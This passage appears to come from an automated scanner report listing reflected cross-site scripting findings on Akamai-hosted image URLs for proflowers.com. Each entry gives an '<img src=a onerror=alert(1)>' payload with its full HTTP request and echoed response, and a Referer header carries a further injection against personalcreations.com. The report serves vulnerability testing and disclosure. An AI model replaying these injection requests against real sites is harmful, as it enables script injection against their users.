GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092bc4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/P0055092bc4c9f<img src=a onerror=alert(1)>f3daf93728a
4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca was submitted in the REST URL parameter 9. This input was echoed as 80d86<img src=a onerror=alert(1)>c8d53e072ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b80d86<img%20src%3da%20onerror%3dalert(1)>c8d53e072ca?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:23 GMT
Connection: close

Unable to find /ProvideCommerce/P0063828b80d86<img src=a onerror=alert(1)>c8d53e072ca
4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c was submitted in the REST URL parameter 9. This input was echoed as 66f8d<img src=a onerror=alert(1)>51a292d4f1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b66f8d<img%20src%3da%20onerror%3dalert(1)>51a292d4f1c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:18 GMT
Connection: close

Unable to find /ProvideCommerce/P0065857b66f8d<img src=a onerror=alert(1)>51a292d4f1c
4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 89fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750 was submitted in the REST URL parameter 9. This input was echoed as 89fba<img src=a onerror=alert(1)>35e1a132750 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188189fba<img%20src%3da%20onerror%3dalert(1)>35e1a132750?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/P007188189fba<img src=a onerror=alert(1)>35e1a132750
4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5 was submitted in the REST URL parameter 9. This input was echoed as 26830<img src=a onerror=alert(1)>e7f4acdcdc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b26830<img%20src%3da%20onerror%3dalert(1)>e7f4acdcdc5?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0073650b26830<img src=a onerror=alert(1)>e7f4acdcdc5
4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53 was submitted in the REST URL parameter 9. This input was echoed as e4e87<img src=a onerror=alert(1)>4b0efed6b53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988be4e87<img%20src%3da%20onerror%3dalert(1)>4b0efed6b53?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/P0085988be4e87<img src=a onerror=alert(1)>4b0efed6b53
4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b was submitted in the REST URL parameter 9. This input was echoed as 2370a<img src=a onerror=alert(1)>c6102b76f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b2370a<img%20src%3da%20onerror%3dalert(1)>c6102b76f4b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0087026b2370a<img src=a onerror=alert(1)>c6102b76f4b
4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871 was submitted in the REST URL parameter 9. This input was echoed as 952f4<img src=a onerror=alert(1)>435cb415871 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b952f4<img%20src%3da%20onerror%3dalert(1)>435cb415871?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/P0102761b952f4<img src=a onerror=alert(1)>435cb415871
4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607 was submitted in the REST URL parameter 9. This input was echoed as 966a9<img src=a onerror=alert(1)>283e49d607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img%20src%3da%20onerror%3dalert(1)>283e49d607?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000007G437_68702_W1_SQ966a9<img src=a onerror=alert(1)>283e49d607
4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b was submitted in the REST URL parameter 9. This input was echoed as a9104<img src=a onerror=alert(1)>f43391f294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img%20src%3da%20onerror%3dalert(1)>f43391f294b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:36 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000008345X_49771_W1_SQa9104<img src=a onerror=alert(1)>f43391f294b
4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c was submitted in the REST URL parameter 9. This input was echoed as 9ac75<img src=a onerror=alert(1)>86b196c9e7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img%20src%3da%20onerror%3dalert(1)>86b196c9e7c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009D282_88198_W1_SQ9ac75<img src=a onerror=alert(1)>86b196c9e7c
4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439 was submitted in the REST URL parameter 9. This input was echoed as 5af77<img src=a onerror=alert(1)>4d163bea439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img%20src%3da%20onerror%3dalert(1)>4d163bea439?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:40 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000009G877_92524_W1_SQ5af77<img src=a onerror=alert(1)>4d163bea439
4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c was submitted in the REST URL parameter 9. This input was echoed as dd160<img src=a onerror=alert(1)>8c6c0a1560c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img%20src%3da%20onerror%3dalert(1)>8c6c0a1560c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:34 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D01X_103184_W1dd160<img src=a onerror=alert(1)>8c6c0a1560c
4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 81f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8 was submitted in the REST URL parameter 9. This input was echoed as 81f6d<img src=a onerror=alert(1)>5a8dda194a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img%20src%3da%20onerror%3dalert(1)>5a8dda194a8?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:20 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000010D946_103270_W181f6d<img src=a onerror=alert(1)>5a8dda194a8
4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d was submitted in the REST URL parameter 9. This input was echoed as da2a9<img src=a onerror=alert(1)>f9d94d0215d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img%20src%3da%20onerror%3dalert(1)>f9d94d0215d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:39 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007G150X_68104_W1_SQda2a9<img src=a onerror=alert(1)>f9d94d0215d
4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30 was submitted in the REST URL parameter 9. This input was echoed as fdac5<img src=a onerror=alert(1)>8cb69ded30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img%20src%3da%20onerror%3dalert(1)>8cb69ded30?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:21 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000007H4854_70842_W1_SQfdac5<img src=a onerror=alert(1)>8cb69ded30
4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ

Issue detail

